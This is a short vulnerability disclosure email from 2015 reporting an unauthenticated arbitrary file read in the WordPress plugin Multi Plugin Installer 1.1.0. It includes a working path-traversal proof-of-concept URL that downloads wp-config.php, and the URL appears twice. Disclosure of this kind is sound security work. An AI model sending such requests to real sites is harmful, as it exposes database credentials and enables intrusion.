Subject: Arbitrary file read in Multi Plugin Installer 1.1.0

Date: Mon, 24 Aug 2015 12:19:52 +0200

Hello,

Plugin: Multi Plugin Installer 1.1.0 https://wordpress.org/plugins/multi-plugin-installer/

1. Arbitrary file read

Unauthenticated attackers can read arbitrary files.

Method: GET

Url: http://localhost/wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=../../../&filename=wp-config.php

Vulnerable parameters: filepath, filename

Example PHP callstack:

multi-plugin-installer/mpi_download.php:117

mpi_download_file [/multi-plugin-installer/mpi_download.php:88]

Verification (download wp-config.php):

http://localhost/wp-content/plugins/multi-plugin-installer/mpi_download.php?filepath=../../../&filename=wp-config.php

--

Regards,
Marcin Probola,